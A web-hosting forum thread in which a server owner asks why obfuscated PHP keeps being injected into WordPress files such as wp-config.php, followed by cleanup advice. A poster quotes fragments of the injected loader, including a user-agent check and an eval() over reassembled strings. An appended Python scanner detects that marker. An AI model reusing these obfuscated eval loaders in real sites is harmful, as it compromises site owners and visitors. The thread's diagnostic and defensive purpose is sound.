WordPress Files Injected with Malicious Code

Discussion in 'Dedicated Server dan Colocation' started by Zhad, 3 Jun 2015.

Thread Status:
Not open for further replies.
  1. Zhad

    Hi fellow DWH members,
    One of the accounts on my DS has a website that is website-based, and its important files have had strange code injected at the start of the file's code.
    As a result, the plugins are no longer detected from the dashboard.
    This code is in WordPress's core PHP files such as wp-config.php.

    The code:

    Already restored to normal
    Updated salts, WP, theme, plugins
    It keeps getting hit again

    Why is that?

    Thanks
     
  2. Zhad

    This is the code that was injected:

    <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER[ ....
     

  3. BikinDesainSitus

    My suggestion:
    1. export the posts and pages via the dashboard
    2. copy / download the image files in wp-content (make sure they really are image files)
    3. delete all files
    4. reinstall
    5. install the iThemes Security plugin (with all its settings)
    6. import the export from earlier
    7. upload the image files to wp-content

    done...

    Back up!!
     
  4. mustafaramadhan

  5. dhyhost

    For wp-config, to be safe, try changing its permissions to 440 or 400.
     
  6. slepetan

    Curious.. what might this script be doing?
    The beginning:
    Code:
    <?php
    if (!isset($GLOBALS["anuna"])) {
        $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
        if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
    }
    ?>
    The end..
    Code:
    $gubpbmvvqg = substr($rbzjgsiwbp, (45484 - 35378), (32 - 25));
    if (!function_exists('hlzppruxlh')) {
        function hlzppruxlh($qvwxxucpoi, $jmqimpctxe) {
            $lbtiwvkexa = NULL;
            for ($xsnvcjahjp = 0;$xsnvcjahjp < (sizeof($qvwxxucpoi) / 2);$xsnvcjahjp++) {
                $lbtiwvkexa.= substr($jmqimpctxe, $qvwxxucpoi[($xsnvcjahjp * 2) ], $qvwxxucpoi[($xsnvcjahjp * 2) + 1]);
            }
            return $lbtiwvkexa;
        };
    }
    $fmdfhaflgb = " /* zsphxgrgor */ eval(str_replace(chr((153-116)), chr((517-425)), hlzppruxlh($hnoyopqjwg,$rbzjgsiwbp))); /* qdwduicxmi */ ";
    $syumqqgzyd = substr($rbzjgsiwbp, (44524 - 34411), (64 - 52));
    $syumqqgzyd($gubpbmvvqg, $fmdfhaflgb, NULL);
    $syumqqgzyd = $fmdfhaflgb;
    $syumqqgzyd = (525 - 404);
    $rbzjgsiwbp = $syumqqgzyd - 1;
    ?>

    The middle part is still a mystery..
     
  7. Zhad

    What would those image files look like?
    The ones in wp-content have also been injected.

    The result looks like this, sir -> http://www.diskusiwebhosting.com/threads/file-wordpress-di-inject-malicious-code.16820/#post-144429

    I just don't understand what that code does.

    What about the permissions for the other files? The standard is 755, right?
     
  8. mustafaramadhan

  9. dhyhost

  10. Zhad

    @^ I already did that after restoring again, but it got hit again. Oddly, the last modified time in cPanel doesn't change, yet the file has already been injected with that code.
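
A read-only scan for the header quoted in this thread, as an added example that is not code from any poster: it resolves the hex/octal escapes seen in post 2 so the obfuscated key matches the decoded `anuna` form from post 6, and reports the ctime/mtime gap because the last-modified time was reported as unchanged. The 4096-byte window, the function names and the sample tree are assumptions, and `st_ctime` is taken to be the Unix inode change time.

```python
import os
import re
import tempfile

# Marker taken from the thread's sample: the injected header tests
# $GLOBALS["anuna"], with the key written in mixed hex/octal escapes.
MARKER = b'$GLOBALS["anuna"]'
HEAD_BYTES = 4096  # assumption: the injection sits at the start of the file
_ESC = re.compile(rb'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

def decode_php_escapes(data: bytes) -> bytes:
    """Resolve \\xHH and \\OOO escapes as PHP does in double-quoted strings."""
    def repl(m):
        if m.group(1):
            return bytes([int(m.group(1), 16)])
        return bytes([int(m.group(2), 8) & 0xFF])
    return _ESC.sub(repl, data)

def is_injected(head: bytes) -> bool:
    return MARKER in decode_php_escapes(head)

def scan(root: str):
    """Return (path, ctime_minus_mtime_seconds) for each flagged .php file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(HEAD_BYTES)
            if is_injected(head):
                st = os.stat(path)
                # ctime later than mtime hints mtime was set back; a lead, not proof.
                hits.append((path, int(st.st_ctime - st.st_mtime)))
    return sorted(hits)

def demo():
    # Constructed sample tree: one clean file, one with the thread's header.
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "clean.php"), "wb") as fh:
        fh.write(b"<?php echo 'ok';\n")
    bad = os.path.join(root, "wp-config.php")
    with open(bad, "wb") as fh:
        fh.write(b'<?php if(!isset($GLOBALS["\\x61\\156\\x75\\156\\x61"])) { }\n')
    os.utime(bad, (0, 0))  # simulate a reset last-modified time
    return root, scan(root)

if __name__ == "__main__":
    print(demo()[1])
```

A chmod or chown also moves ctime ahead of mtime, so compare flagged files against a known-good copy before drawing conclusions.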
     